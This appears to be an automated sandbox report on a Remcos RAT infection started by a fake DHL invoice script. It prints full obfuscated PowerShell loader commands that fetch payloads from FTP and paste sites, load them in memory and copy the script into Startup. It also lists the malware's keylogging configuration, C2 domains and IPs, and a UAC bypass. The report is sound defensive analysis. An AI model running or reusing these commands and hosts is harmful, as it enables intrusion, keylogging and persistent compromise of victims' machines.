                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' +
                    Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' +
                    Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1928, TargetFilename: C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\x11.ps1

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Copy file to startup via Powershell
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-22T06:17:16.611141+020020204231Exploit Kit Activity Detected188.114.96.3443192.168.2.449735TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-22T06:17:16.611141+020020204251Exploit Kit Activity Detected188.114.96.3443192.168.2.449735TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-22T06:17:25.805214+020020327761Malware Command and Control Activity Detected192.168.2.44974543.226.229.23257484TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-22T06:17:27.226086+020020327771Malware Command and Control Activity Detected43.226.229.23257484192.168.2.449745TCP
                    2024-10-22T06:19:42.831194+020020327771Malware Command and Control Activity Detected43.226.229.23257484192.168.2.449745TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-22T06:17:13.710351+020028033053Unknown Traffic192.168.2.449734188.114.96.3443TCP
                    2024-10-22T06:17:21.239768+020028033053Unknown Traffic192.168.2.449741188.114.96.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-22T06:17:29.198114+020028033043Unknown Traffic192.168.2.449748178.237.33.5080TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-22T06:17:08.765856+020028410751Malware Command and Control Activity Detected192.168.2.449732188.114.96.3443TCP
                    2024-10-22T06:17:13.710351+020028410751Malware Command and Control Activity Detected192.168.2.449734188.114.96.3443TCP
                    2024-10-22T06:17:21.239768+020028410751Malware Command and Control Activity Detected192.168.2.449741188.114.96.3443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000015.00000002.3074510288.0000000000F18000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["iwarsut775laudrye001.duckdns.org:57484:0", "iwarsut775laudrye001.duckdns.org:57483:1", "iwarsut775laudrye3.duckdns.org:57484:0", "hjnourt38haoust1.duckdns.org:57484:0"], "Assigned name": "Cla$$", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "shietgtst-DDGG2A", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "kanspt.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": ""}
                    Multi AV Scanner detection for domain / URL
                    Source: desckvbrat.com.brVirustotal: Detection: 7%Perma Link
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kanspt.dat, type: DROPPED
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,23_2_004338C8
                    Source: powershell.exe, 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_7af7000a-4

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Contains functionality to bypass UAC (CMSTPLUA)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00407538 _wcslen,CoGetObject,23_2_00407538
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49735 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49744 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49746 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49749 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49750 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49751 version: TLS 1.2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,21_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,23_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,23_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,23_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,23_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,23_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00407877 FindFirstFileW,FindNextFileW,23_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,23_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,23_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,23_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0040AE51 FindFirstFileW,FindNextFileW,29_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,30_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,31_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,23_2_00407CD2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

                    Software Vulnerabilities

                    barindex
                    Suspicious execution chain found
                    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49745 -> 43.226.229.232:57484
                    Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 43.226.229.232:57484 -> 192.168.2.4:49745
                    Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 188.114.96.3:443 -> 192.168.2.4:49735
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 188.114.96.3:443 -> 192.168.2.4:49735
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: iwarsut775laudrye001.duckdns.org
                    Source: Malware configuration extractorURLs: iwarsut775laudrye001.duckdns.org
                    Source: Malware configuration extractorURLs: iwarsut775laudrye3.duckdns.org
                    Source: Malware configuration extractorURLs: hjnourt38haoust1.duckdns.org
                    Connects to a pastebin service (likely for C&C)
                    Source: unknownDNS query: name: paste.ee
                    Source: unknownDNS query: name: pastebin.com
                    Connects to many ports of the same IP (likely port scanning)
                    Source: global trafficTCP traffic: 191.252.83.213 ports 1,2,60710,60113,60162,21
                    Uses dynamic DNS services
                    Source: unknownDNS query: name: iwarsut775laudrye001.duckdns.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 3.2.powershell.exe.2203c568c58.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c21294da58.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab8944f358.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3a11dd948.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.powershell.exe.2203d996da0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.powershell.exe.1b32ce4ed60.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a88030d738.0.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.4:49731 -> 191.252.83.213:60113
                    Source: global trafficTCP traffic: 192.168.2.4:49745 -> 43.226.229.232:57484
                    Source: global trafficHTTP traffic detected: GET /d/jm8qu/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/d80GV/0 HTTP/1.1Host: paste.ee
                    Source: global trafficHTTP traffic detected: GET /class.txt HTTP/1.1Host: b2case.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/r322U/0 HTTP/1.1Host: paste.ee
                    Source: global trafficHTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1Host: pastebin.comConnection: Keep-Alive
